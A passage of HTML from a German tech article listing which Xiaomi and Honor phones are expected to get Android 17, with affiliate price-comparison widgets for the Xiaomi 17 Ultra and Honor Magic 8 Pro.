							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Xiaomi</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e2628cd81"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/PXL_20260310_145909935.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Xiaomi 17 kameror" class="wp-image-3086446" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Xiaomi ist nicht immer eindeutig mit den eigenen Update-Versprechen. Es gibt aber noch viele aktuelle Geräte, die Teil des Update-Zyklus sein dürften.</p>



<p>Xiaomi liefert Android 17 daher voraussichtlich an folgende Geräte aus:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3078239/xiaomi-17-test.html" target="_blank" rel="noreferrer noopener">17</a> / Pro / Pro Max / <a href="https://www.pcwelt.de/article/3131894/xiaomi-17-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2635137/xiaomi-15-test.html" target="_blank" rel="noreferrer noopener">15</a> / <a href="https://www.pcwelt.de/article/2641294/xiaomi-15-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2924488/xiaomi-15t-test.html" target="_blank" rel="noreferrer noopener">15 T</a> / <a href="https://www.pcwelt.de/article/2924662/xiaomi-15t-pro-test-2.html" target="_blank" rel="noreferrer noopener">15 T Pro</a></li>



<li>15S Pro</li>



<li><a href="https://www.pcwelt.de/article/2250161/xiaomi-14-hands-on.html" target="_blank" rel="noreferrer noopener">14</a> / <a href="https://www.pcwelt.de/article/2313696/das-xiaomi-14-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2489914/test-xiaomi-14t-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>14 T / 14 T Pro</li>



<li>13T /<a href="https://www.pcwelt.de/article/2086566/xiaomi-13t-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a></li>



<li><a href="https://www.pcwelt.de/article/3060842/xiaomi-redmi-note-15-5g-test.html" target="_blank" rel="noreferrer noopener">Redmi Note 15</a> / <a href="https://www.pcwelt.de/article/3029932/xiaomi-redmi-note-15-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3044182/xiaomi-redmi-note-15-pro-plus-5g-test.html" target="_blank" rel="noreferrer noopener">Pro+</a></li>



<li>Redmi Note 14 / Pro / Pro+</li>



<li>Poco X8 / Pro / <a href="https://www.pcwelt.de/article/3105908/tpoco-x8-pro-max-test.html" target="_blank" rel="noreferrer noopener">Pro Max</a></li>



<li>Poco F8 / <a href="https://www.pcwelt.de/article/3012838/poco-f8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3012817/xiaomi-poco-f8-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li>Poco M8 / <a href="https://www.pcwelt.de/article/3072287/poco-m8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco X7 / <a href="https://www.pcwelt.de/article/2573751/xiaomi-poco-x7-pro-amazon-angebot-early-bird-rabatt.html" target="_blank" rel="noreferrer noopener">Pro</a> </li>



<li><a href="https://www.pcwelt.de/article/2828306/xiaomi-poco-f7-test.html" target="_blank" rel="noreferrer noopener">Poco F7</a> / <a href="https://www.pcwelt.de/article/2653239/poco-f7-pro-martphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco F6 / <a href="https://www.pcwelt.de/article/2356099/das-poco-f6-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco M7 / Pro</li>



<li>Mix Fold 4</li>



<li>Mix Flip </li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr:</strong> Xiaomi 13 Lite, 13 Pro, Redmi K60 Ultra, Redmi K70 Ultra, Redmi Turbo 3, Poco X6, X6 Pro, X6 5G, Poco M6 Plus, Mix Fold 3.</p>



<p><strong>Xiaomi 17 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260619&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kt1XCJM1FqeRDMrEUYsO-lVt6WZAp33caFQNuxad7411g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260619&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kt1XCJM1FqeRDMrEUYsO-lVt6WZAp33caFQNuxad7411g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.249,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=PdaPEYhCDIGgFdiMIpCMzMRUV2gUzsRVRq5LL3gM66IWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260619&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=PdaPEYhCDIGgFdiMIpCMzMRUV2gUzsRVRq5LL3gM66IWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.249,00 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 1.249,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.392,75 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=niPwaCpvT8PvsU1Wdh-mdc5Hd99OQeF7StcxREqHR7q63YeDFtoR-orhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260619&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=niPwaCpvT8PvsU1Wdh-mdc5Hd99OQeF7StcxREqHR7q63YeDFtoR-orhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.392,75 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.392,75 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260619&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260619&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/xiaomi-logo.svg" alt="Xiaomi" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-price="1.499,90 €" data-vars-product-vendor="Xiaomi" aria-label="Deal anschauen bei Xiaomi für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Honor</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e26297e30"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/IMG_9620.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Honor Magic V6" class="wp-image-3077615" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Hall / Foundry</p></div>



<p>Honor ist ebenfalls einer der Hersteller, die länger Android-Updates an ihre Geräte ausliefern. Bis zu sieben Jahre ist der Update-Zyklus hier, was aber vor allem für Flaggschiff-Modelle gilt.</p>



<p>Diese Honor-Smartphones bekommen wahrscheinlich das Update auf Android 17:</p>



<p><strong>Sollten auch Android 17 bekommen:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3143704/honor-600-test.html" target="_blank" rel="noreferrer noopener">600</a> / Pro</li>



<li>Magic 8 / <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3011397/honor-magic-8-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V6</li>



<li><a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Magic V5</a></li>



<li><a href="https://www.pcwelt.de/article/2795141/honor-400-smartphone-test.html" target="_blank" rel="noreferrer noopener">400</a> / <a href="https://www.pcwelt.de/article/2801931/honor-400-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>200 / <a href="https://www.pcwelt.de/article/2379154/honor-200-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro </a>/ Lite / Smart</li>



<li>Magic 6 / <a href="https://www.pcwelt.de/article/2286476/das-honor-magic-6-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Magic 7 / Pro / <a href="https://www.pcwelt.de/article/2602028/honor-magic-7-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V Flip</li>
</ul>



<p><strong>Voraussichtlich kein Android 17: </strong>Magic 5, Magic 5 Pro, Magic V2, Magic V3, Magic VS, X50 Pro, X60 Pro, Honor 90, Honor 90 Lite.</p>



<p><strong>Honor Magic 8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>911,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="911,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 911,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>986,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vendor-api="shopping24" data-vars-product-price="986,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 986,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>986,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=caP71K0dy6LgFdiMIpCMzNuzbPmHXZ_CkbN7aF8bFrTARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260619&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=caP71K0dy6LgFdiMIpCMzNuzbPmHXZ_CkbN7aF8bFrTARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="986,99 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 986,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>989,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=yrRIbPc_h2Wf7aDQSDOyE6p_UT5rEg4IFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_G7OfJuvmdYJVPoqacKphKIai9bm1G-GO_9b1SEqOQXKJohhjmWN-a6-8R6lrAC6sfmW34S_ZA8J&amp;mid=686422767571&amp;id=686422767571&amp;ts=20260619&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=yrRIbPc_h2Wf7aDQSDOyE6p_UT5rEg4IFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_G7OfJuvmdYJVPoqacKphKIai9bm1G-GO_9b1SEqOQXKJohhjmWN-a6-8R6lrAC6sfmW34S_ZA8J&amp;mid=686422767571&amp;id=686422767571&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="989,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 989,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260619&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/honor-logo.svg" alt="Honor" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,90 €</span>						</div>
						<div>
